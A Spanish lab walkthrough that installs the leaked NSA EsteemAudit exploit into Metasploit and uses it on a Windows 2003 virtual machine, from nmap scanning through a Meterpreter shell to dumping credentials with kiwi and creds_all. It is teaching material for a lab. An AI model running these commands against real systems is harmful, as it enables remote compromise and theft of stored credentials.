La práctica consiste en explotar un Windows 2003 x86 con los exploits filtrados de la NSA desde Metasploit. La práctica incluye la instalación del ejecutable original de EsteemAudit-2.1.0.exe.
1. Identifica en que rango esta la máquina virtual desde Kali:
root@kali:~# ifconfig eth0
(el rango debe verse similar a 192.168.179.XXX)
2. Escanea la red e identifica la máquina virtual en el rango:
root@kali:~# nmap -O 192.168.179.*
3. Instalando EsteemAudit-2.1.0.exe en Metasploit con mi script:
3b. Si no pueden copiar la liga, entren a https://gist.github.com/hkm/ y den click derecho en el boton [Raw] y seleccionen “Save Link As…”
4. Ejecuten el archivo con los siguiente comando en el Terminal:
root@kali:~# sh esteemaudit-install.sh
5. Entramos a Metasploit:
root@kali:~# msfconsole
6. Busca la ruta del exploit de ESTEEMAUDIT:
msf》 search esteem
7. Selecciona el exploit con el siguiente comando:
msf》 use exploits/windows/rdp/esteemaudit
8. Mira la información del exploit utilizando:
msf exploit(esteemaudit) 》 show info
9. Pon la dirección IP del Windows2003-x86:
msf exploit(esteemaudit) 》 set RHOST AQUÍLADIRECCIÓNIP
10. Ejecuta el exploit:
msf exploit(esteemaudit) 》 exploit
11. Recibiremos una shell en forma de Meterpreter, para ver su información escribimos:
meterpreter 》 sysinfo
12. Cargamos el módulo kiwi para obtener credenciales:
meterpreter 》 load kiwi
13. Listamos las credenciales de la computadora:
meterpreter 》 creds_all